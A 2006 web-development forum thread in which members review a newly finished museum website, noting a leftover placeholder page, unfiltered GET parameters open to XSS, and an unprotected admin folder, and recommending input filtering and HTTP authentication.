Finally done - completely DONE!

It doesn't matter if you do all the error checking in the world, or if you have the most beautiful graphics, if your site or application design isn't usable, it's not going to do well. Get input and advice on usability and user interface issues here.

Moderator: General Moderators

User avatar
Luke
The Ninja Space Mod
Posts: 6424
Joined: Fri Aug 05, 2005 1:53 pm
Location: Paradise, CA

Finally done - completely DONE!

Post by Luke »

I know I've shown this site a hundred times, but it's been a long process (lots of back-end admin stuff you don't see on the site). It's finally done. What do you all think?

http://goldnuggetmuseum.com/
redmonkey
Forum Regular
Posts: 836
Joined: Thu Dec 18, 2003 3:58 pm

Post by redmonkey »

I'm loving the minimalistic approach.

Presumably there is supposed to be more on the page other than 'Coming Soon'?
Ree
Forum Regular
Posts: 592
Joined: Fri Jun 10, 2005 1:43 am
Location: LT

Post by Ree »

:lol:
User avatar
RobertGonzalez
Site Administrator
Posts: 14293
Joined: Tue Sep 09, 2003 6:04 pm
Location: Fremont, CA, USA

Post by RobertGonzalez »

Dude, I'm hiring you to do my next design project. There is NO way that I could ever do what you did there... :wink:
User avatar
Luke
The Ninja Space Mod
Posts: 6424
Joined: Fri Aug 05, 2005 1:53 pm
Location: Paradise, CA

Post by Luke »

haha :D
User avatar
patrikG
DevNet Master
Posts: 4235
Joined: Thu Aug 15, 2002 5:53 am
Location: Sussex, UK

Post by patrikG »

Beautiful, plus it's 100% standards compliant: http://validator.w3.org/check?uri=http% ... eum.com%2F
User avatar
hawleyjr
BeerMod
Posts: 2170
Joined: Tue Jan 13, 2004 4:58 pm
Location: Jax FL & Spokane WA USA

Post by hawleyjr »

Out of curiosity why did you send the form warning messages through GET?

like this
User avatar
Luke
The Ninja Space Mod
Posts: 6424
Joined: Fri Aug 05, 2005 1:53 pm
Location: Paradise, CA

Post by Luke »

you know, I'm not really sure. Should have just send $msg=error and then had it do an if $msg == erre then post "this error message" but oh well.,
User avatar
hawleyjr
BeerMod
Posts: 2170
Joined: Tue Jan 13, 2004 4:58 pm
Location: Jax FL & Spokane WA USA

Post by hawleyjr »

Good job on the site nonetheless.

BTW, the reason I asked is because I had a client who's site did the same and they hired be because someone sent them an email with a screenshot where someone changed the text in query string to be more of a hate message.. 8O
redmonkey
Forum Regular
Posts: 836
Joined: Thu Dec 18, 2003 3:58 pm

Post by redmonkey »

The Ninja Space Goat wrote:you know, I'm not really sure. Should have just send $msg=error and then had it do an if $msg == erre then post "this error message" but oh well.,
Yeah especially when you don't seem to be filtering what you're displaying...

example

I didn't try to see what other nonsense I could get up to.

Also, maybe it's just me that's seeing a (more or less) blank page with 'Coming Soon' on it when I hit http://goldnuggetmuseum.com/ ? from another browser I get a blank page with two question marks which acheives nothing other than adding to the intrigue.

http://goldnuggetmuseum.com/index.php on the other hand works as intended.
User avatar
RobertGonzalez
Site Administrator
Posts: 14293
Joined: Tue Sep 09, 2003 6:04 pm
Location: Fremont, CA, USA

Post by RobertGonzalez »

Wowsers, there is a site there! When I went to the URL it was a blank coming soon page (I bet that was an index.html placeholder still in place...). Anyway, now I see the site.
User avatar
patrikG
DevNet Master
Posts: 4235
Joined: Thu Aug 15, 2002 5:53 am
Location: Sussex, UK

Post by patrikG »

the way it is, you've left the door to XSS wide, wide open - example, Session hijacking is another issue you should concern yourself with, along with SQL-injection.

This site is asking to be cracked if you don't filter anything coming from the outside (i.e. HTTP-requests: $_POST, $_GET, $_REQUEST) - for some background, read http://www.sitepoint.com/blogs/2004/03/ ... strangers/
http://www.sitepoint.com/article/php-security-blunders
http://www.sitepoint.com/article/sql-in ... tacks-safe

Handing this site over to the client as is would be very, very bad practice and, imho, irresponsible.
User avatar
RobertGonzalez
Site Administrator
Posts: 14293
Joined: Tue Sep 09, 2003 6:04 pm
Location: Fremont, CA, USA

Re: Finally done - completely DONE!

Post by RobertGonzalez »

The Ninja Space Goat wrote:I know I've shown this site a hundred times, but it's been a long process (lots of back-end admin stuff you don't see on the site). It's finally done. What do you all think?

http://goldnuggetmuseum.com/
Hey Ninja, just so you know, when you visit the link above the page shown is made up of the following code...

Code: Select all

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
  <title>Paradise Gold Nugget Museum - Coming Soon!</title>
  <link href="style.css" rel="stylesheet" type="text/css" />
 </head>
 <body style="margin: 0; padding: 0;">
  <div style="padding: 75px"><img src="comingsoon.gif" alt="" /></div>

  <div style="border-top: 2px solid black;border-bottom: 2px solid black; height: 204px; padding-left: 100px;"><img src="main.jpg" alt="Coming Soon" /></div>
 </body>
</html>
The site loads fine when you use http://goldnuggetmuseum.com/index.php. Do you have an index.html file on the server?
User avatar
RobertGonzalez
Site Administrator
Posts: 14293
Joined: Tue Sep 09, 2003 6:04 pm
Location: Fremont, CA, USA

Post by RobertGonzalez »

Another thing. You really should lock down your administration folder. It looks nice though 8). But it should probably be behind a password protected form of some sort.

EDIT: Sorry, maybe that was just your tinyMCE implementation test. Still looks nice.
User avatar
patrikG
DevNet Master
Posts: 4235
Joined: Thu Aug 15, 2002 5:53 am
Location: Sussex, UK

Post by patrikG »

regarding the administration folder: put it behind HTTP-Authentication - easy and secure. As everah said, I didn't even have to log in... 8O
Last edited by patrikG on Wed Apr 05, 2006 10:52 pm, edited 1 time in total.
Post Reply